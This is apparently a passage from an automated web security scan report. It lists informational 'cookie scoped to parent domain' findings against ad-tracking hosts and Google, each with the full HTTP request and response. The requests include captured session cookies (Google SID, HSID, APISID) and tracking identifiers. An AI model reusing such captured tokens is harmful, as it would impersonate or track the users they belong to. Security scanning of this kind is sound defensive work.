Cookie: linkjumptest=1; LP=1316276716; CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1_43407814-6-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us_926534-vu@|M-0

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:43:21 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b103.dl
Set-Cookie: CS1=deleted; expires=Fri, 17 Sep 2010 16:43:20 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1%5D%5D%3E%3E_43407814-6-82_43624044-35-1; expires=Wed, 07 Nov 2012 08:43:21 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us_927907-[)@|M-0; expires=Wed, 07-Nov-2012 08:43:21 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;
12.67. http://amch.questionmarket.com/adscgen/dynamiclink.js.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/dynamiclink.js.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=918801&lang=&from_node=28067&site=8 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us; linkjumptest=1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:37:56 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b103.dl
Set-Cookie: LP=1316277476; expires=Wed, 21 Sep 2011 20:37:56 GMT; path=/; domain=.questionmarket.com
Content-Length: 2417
Content-Type: text/html

(function(){
var d=document,w=window,dle;

function ff(){
var p=w.parent,r;

while (p != top) {
try {
if (p.location.host == w.location.host)
   r = p.document.referrer;
} catch (e) { }

p = p.paren
...[SNIP]...
12.68. http://api.aggregateknowledge.com/optout2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.aggregateknowledge.com
Path:   /optout2

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout2?s=nai&nocache=0.8631503 HTTP/1.1
Host: api.aggregateknowledge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: uuid=""; Version=1; Domain=.aggregateknowledge.com; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.aggregateknowledge.com; Max-Age=157680000; Expires=Thu, 15-Sep-2016 17:14:36 GMT; Path=/
Location: http://api.agkn.com/optout2?s=nai&dc=1
Content-Language: en-US
Content-Length: 0
Date: Sat, 17 Sep 2011 17:14:36 GMT
Connection: close

12.69. http://api.agkn.com/optout2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.agkn.com
Path:   /optout2

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout2?s=nai&dc=1 HTTP/1.1
Host: api.agkn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: uuid=790101267012119588; u=6|0BEgV%2BAZ5AAAwAAcBACcBA1irAAUAuwEAnwDOAQCfAJwBAJ8AnQEAnwCeAQCfAQJQfQHlAAAAAAPsKsEAAAAAApZbUAAAAAAOfLfdAWsAHQ%3D%3D

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: uuid=""; Version=1; Domain=.agkn.com; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=""; Version=1; Domain=.agkn.com; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Thu, 15-Sep-2016 17:15:26 GMT; Path=/
Location: http://api.aggregateknowledge.com/optout2?s=nai&q=validate
Content-Language: en-US
Content-Length: 0
Date: Sat, 17 Sep 2011 17:15:26 GMT
Connection: close

12.70. http://api.choicestream.com/instr/crunch/almondnet/seg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.choicestream.com
Path:   /instr/crunch/almondnet/seg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /instr/crunch/almondnet/seg?segs=300201,0&rnd=152139181 HTTP/1.1
Host: api.choicestream.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://pbid.pro-market.net/engine?site=111778;size=1x1;kw=%20-%20Search%20for%20local%20businesses,%20events,%20and%20coupons%20near%20you;siteref=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue;rnd=(1316295499352)
Cookie: CSAnywhere=e74b545d-4693-4a7c-bc85-28be31beaff6

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-CS-Request-Id: 47245d0f-81c9-4c0a-95dc-82cd24b06e97
P3P: policyref="http://www.choicestream.com/w3c/p3p.xml",CP="NOI DSP COR NID ADMa DEVa PSAo PSDo OUR STP"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0
Pragma: no-cache
Last-Modified: Sat, 17 Sep 2011 16:56:58 GMT
Content-Type: image/gif
Content-Length: 43
Date: Sat, 17 Sep 2011 16:56:58 GMT
Connection: close
Set-Cookie: __cs_pcs=""; Domain=.choicestream.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/instr/crunch
Set-Cookie: CSAnywhere=e74b545d-4693-4a7c-bc85-28be31beaff6; Domain=.choicestream.com; Expires=Sun, 16-Sep-2012 16:56:58 GMT; Path=/

GIF89a.............!...
...,...........L..;
12.71. http://apis.google.com/js/plusone.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apis.google.com
Path:   /js/plusone.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/plusone.js HTTP/1.1
Host: apis.google.com
Proxy-Connection: keep-alive
Referer: http://www.uproxx.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; NID=51=Z9pR-TbreYtiwzhbmN2ojBv2fNl1QAPxQeWrm1J_y45P4t6ygVW2ZhFmQnahT2uKQ0N-_KNjVBogcXqLYRGX-7a_XIycsdr1AIwFJAWxlj4C1JiVsaZc2byYK6Ie4Ahz; SID=DQAAAPAAAAD7Xl0oDS_3Xy0JKwYeKgRjb4mFhO8s9VCzxxwsHFWl5Z11Hlug2MgdCExcQRMRoy4PSRUoNV-Y2dnoZafHdvtGru0a_Lk3-ysyQWUQihRlon0D1Ac0BHwlFhmCm9rm4Aq9Dur_13HoNqB4O34EHyTyDX5GtXlfQh8vapHPdD8hi2QjK1inyk2fyPcW-fa45C2vXbhQQWXl3EEQHm_QxXhNWPGTbe4q--uRumziR7gyLGt-2sPW4WtJpiJBbPp3-MlnP_RQ_tDo0mQAhrrx48dXpimEcHX2haTJ9-UCk0B1Hp58NFcPmYgQJ7XglFMWkVA

Response

HTTP/1.1 200 OK
Set-Cookie: SID=DQAAAPAAAAD7Xl0oDS_3Xy0JKwYeKgRjo29C9Etlmdrf1rKRRhnPW2DH-o5OttJhxFzFxEFn6ju4VPTRDgLlPtwafUNQFRahHj6mCab0WIpyAqqm2hl9rQvAIANpUEGFZoRtDOSua8174wnbnttZYbRG20rW3N8C-dyaWqikyxcktxD7QGCjAOOzbClgJMEES8i3q3nhChEwp4p5Mx1yKROZ3eKbvo1BYeGjW6bfNqWex_ZAOhwTyhNgILH07Zu0VfnWZ4O0MMOmHGNnjTEYjxC_KQC8XsOhIb_sEm1Vln8ARJJiFZ6HAI0dqAwFsvLwnkDIQoa-T6o;Domain=.google.com;Path=/;Expires=Tue, 14-Sep-2021 17:35:34 GMT
Content-Type: text/javascript; charset=utf-8
P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Expires: Sat, 17 Sep 2011 17:35:34 GMT
Date: Sat, 17 Sep 2011 17:35:34 GMT
Cache-Control: private, max-age=3600
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 5519

window.___jsl=window.___jsl||{};
window.___jsl.h=window.___jsl.h||'r;gc\/23803279-4555db52';
window.___jsl.l=[];
window.__GOOGLEAPIS=window.__GOOGLEAPIS||{};
window.__GOOGLEAPIS.gwidget=window.__GOOGL
...[SNIP]...
12.72. http://ats.tumri.net/ats/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ats.tumri.net
Path:   /ats/optout

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ats/optout?nai=true&id=1936234986&nocache=0.4719862 HTTP/1.1
Host: ats.tumri.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Sat Sep 17 17:20:29 UTC 2011
Set-Cookie: t_opt=OPT-OUT; Domain=.tumri.net; Expires=Thu, 05-Oct-2079 20:34:36 GMT; Path=/
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Location: http://ats.tumri.net:80/ats/optoutcheck?nai=true&id=1936234986&nocache=0.4719862&tu=1
Content-Length: 0
Date: Sat, 17 Sep 2011 17:20:28 GMT

12.73. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=8&c2=2101&c3=1234567891234567891&ns__t=1316294698613&ns_c=ISO-8859-1&c8=&c7=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F610%2Fhearst%2F300x250%2Fht_1064834_61686642%3Ft%3D1316294694453%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253A%252F%252Fwww.seattlepi.com%252F%26refer%3Dhttp%253A%252F%252Fhearst.com%252Fnewspapers%252Fseattlepicom.php&c9=http%3A%2F%2Fwww.seattlepi.com%2F HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686642?t=1316294694453&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fseattlepicom.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sat, 17 Sep 2011 16:23:46 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Mon, 16-Sep-2013 16:23:46 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate

12.74. http://b.scorecardresearch.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=1&c2=7395021&c3=&c4=&c5=01&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sat, 17 Sep 2011 16:23:17 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Mon, 16-Sep-2013 16:23:17 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate

GIF89a.............!.......,...........D..;
12.75. http://b.scorecardresearch.com/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6036097&d.c=gif&d.o=hearstconnecticutglobal&d.x=227414770&d.t=page&d.u=http%3A%2F%2Fwww.stamfordadvocate.com%2F&d.r=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fthe-advocate.php HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.stamfordadvocate.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sat, 17 Sep 2011 16:23:09 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Mon, 16-Sep-2013 16:23:09 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate

GIF89a.............!.......,...........D..;
12.76. http://bh.contextweb.com/bh/rtset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=537085&ev=439524AE8C6B634E021F5F7802166020 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.gather.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: cw-app600
Cache-Control: no-cache, no-store
Set-Cookie: V=PpAVCxNh2PJr; Domain=.contextweb.com; Expires=Tue, 11-Sep-2012 16:31:14 GMT; Path=/
Set-Cookie: pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; Version=1; Domain=.contextweb.com; Max-Age=31536000; Expires=Sun, 16-Sep-2012 16:31:14 GMT; Path=/
Content-Type: image/gif
Date: Sat, 17 Sep 2011 16:31:13 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;
12.77. http://bh.contextweb.com/bh/set.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/set.aspx?action=clr&advid=3420&token=RORO1 HTTP/1.1
Host: bh.contextweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://rs.gwallet.com/r1/pixel/x1743
Cookie: V=ZZVrXBMk1mFi; cwbh1=3055%3B10%2F02%2F2011%3BMCRI1%0A749%3B09%2F17%2F2011%3BDOTM5%0A1443%3B09%2F21%2F2011%3BNETM7%0A3283%3B10%2F06%2F2011%3BTMII1%0A996%3B10%2F12%2F2011%3BFACO1; pb_rtb_ev="1:530739.4e394470-3e17-879f-6d77-411115d4b5ad.0|535495.7ef581ac-c15f-11e0-b71a-00259009a9e4.0|534301.04b10af1-b730-4018-9aca-0ef231c6c059.0|535039.0adf278a-5c84-4e01-8d4e-00e9b3c85ea1.0|538064.6731d4ad-7dae-4402-b507-a0bc233d79fb.0|537583.9ce25df1-8701-4684-948e-35b3d6998d9a.0|530912.WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==.0|536088.2040695539456590.0|531292.BO-00000000521444319.0|534889.y9dly9jlztlwn.0|538303.x.0|535461.9033442320916087634.0"; C2W4=3ZWkodKrBuUFHIpAOk9fo5hjK_amQu3P6HhM4sg24rYSrdGNgVCZJAg; cw=cw; FC1-WC=53620_1_3ELLi; vf=1

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: cw-app600
Set-Cookie: V=ZZVrXBMk1mFi; Domain=.contextweb.com; Expires=Tue, 11-Sep-2012 17:04:35 GMT; Path=/
Set-Cookie: cwbh1=3055%3B10%2F02%2F2011%3BMCRI1%0A1443%3B09%2F21%2F2011%3BNETM7%0A3283%3B10%2F06%2F2011%3BTMII1%0A996%3B10%2F12%2F2011%3BFACO1; Domain=.contextweb.com; Expires=Sun, 16-Sep-2012 17:04:35 GMT; Path=/
Content-Type: image/gif
Date: Sat, 17 Sep 2011 17:04:35 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;
12.78. http://ce.lijit.com/merge  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ce.lijit.com
Path:   /merge

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /merge?pid=2&3pid=439524AE8C6B634E021F5F7802166020 HTTP/1.1
Host: ce.lijit.com
Proxy-Connection: keep-alive
Referer: http://www.gather.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJWslJSqgUACLkB7g%3D%3D; OABLOCK=785.1315190256_3841.1316036511; OACAP=785.14_3841.1; ljt_reader=9a524261efe1e1588396f48f16471b3c; tpro=eJyVUctuxCAQ%2B5c5oy2EvO899gvaCiFCEqQEVoStVEX5986wTbfXvY0t4%2FGYHa4xjG6x0O8wWT%2FYSNOqieGXSjAY7YnK7mCgp6yVShTEcVQIBE0GNYJWyZKA7BjISpVdBhWDiqvrctsIFmgUtclORt8McV2L5mNUej199ea0R8Bgdtv1ZEOaKSRHCzO7ZYjWk40PJGgKBt%2F2vqNFhfMmrHkNV5ITLSTG4qrOoMBYNVeC8zMkjo%2BUDe0Iy2LvN%2Fvgf3v4RyPEq6eoB7WZOYesDny3uUQ53vc8QQ9vdnD64%2BXVJxuTdn61PgEemaAXUtRc1pXAXp7R10%2FqW3F8%2FhWIv5wcdfPYzmANgzLh5ukRgy8bNxewXhAXDsfxA9vRnzQ%3D; ljt_csync=rtb_turn%3A1316036512%2Crtb_simplifi%3A1316036512%2Crtb_mmath%3A1316036512%2C1%3A1316036512%2Crtb_media6%3A1316036512

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:31:11 GMT
Server: PWS/1.7.3.6
X-Px: ms sea-ag1-n11 ( sea-ag1-n10), ms sea-ag1-n10 ( origin>CONN)
P3P: CP="CUR ADM OUR NOR STA NID"
Cache-Control: private, max-age=0, no-cache, max-age=86400, must-revalidate
Pragma: no-cache
Expires: Sun, 18 Sep 2011 16:31:11 GMT
Content-Length: 43
Content-Type: image/gif
Connection: keep-alive
Set-Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; expires=Sun, 16-Sep-2012 16:31:11 GMT; path=/; domain=.lijit.com

GIF89a.............!.......,...........D..;
12.79. http://cm.npc-hearst.overture.com/js_1_0/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.npc-hearst.overture.com
Path:   /js_1_0/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js_1_0/?config=2130893885&type=home_page&ctxtId=home_page&keywordCharEnc=utf8&source=npc_hearst_stamfordadvocate_t2_ctxt&adwd=171&adht=630&ctxtUrl=http%3A%2F%2Fwww.stamfordadvocate.com%2F&css_url=http://www.stamfordadvocate.com/css/hdn/modules/ads/ysm.css&refUrl=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fthe-advocate.php&du=1&cb=1316294655906&ctxtContent=%3Chead%3E%0A%09%09%3Cscript%20type%3D%22text%2Fjavascript%22%20async%3D%22%22%20src%3D%22http%3A%2F%2Fwww.google-analytics.com%2Fga.js%22%3E%3C%2Fscript%3E%3Cscript%3Evar%20HDN%20%3D%20HDN%20%7C%7C%20%7B%7D%3B%20HDN.t_firstbyte%20%3D%20Number(new%20Date())%3B%3C%2Fscript%3E%0A%09%09%3Cmeta%20http-equiv%3D%22content-type%22%20content%3D%22text%2Fhtml%3B%20charset%3Dutf-8%22%20name%3D%22noname%22%3E%0A%0A%09%09%3C!--%20generated%20at%202011-09-17%2011%3A18%3A09%20on%20prodWCM3%20running%20v2.5.6_p1.9644%20--%3E%0A%0A%09%09%3Cmeta%20name%3D%22adwiz-site%22%20content%3D%22sa%22%3E%0A%09%09%3Cmeta%20name%3D%22skype_toolbar%22%20content%3D%22SKYPE_TOOLBAR_PARSER_COMPATIBLE%22%3E%0A%0A%09%09%0A%09%09%3Cscript%20type%3D%22text%2Fjavascript%22%3E%0A%09%09%09%2F%2F%20%3C HTTP/1.1
Host: cm.npc-hearst.overture.com
Proxy-Connection: keep-alive
Referer: http://www.stamfordadvocate.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh; UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDUyMnF0tnc1cAC6ZN1ww=

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:04 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
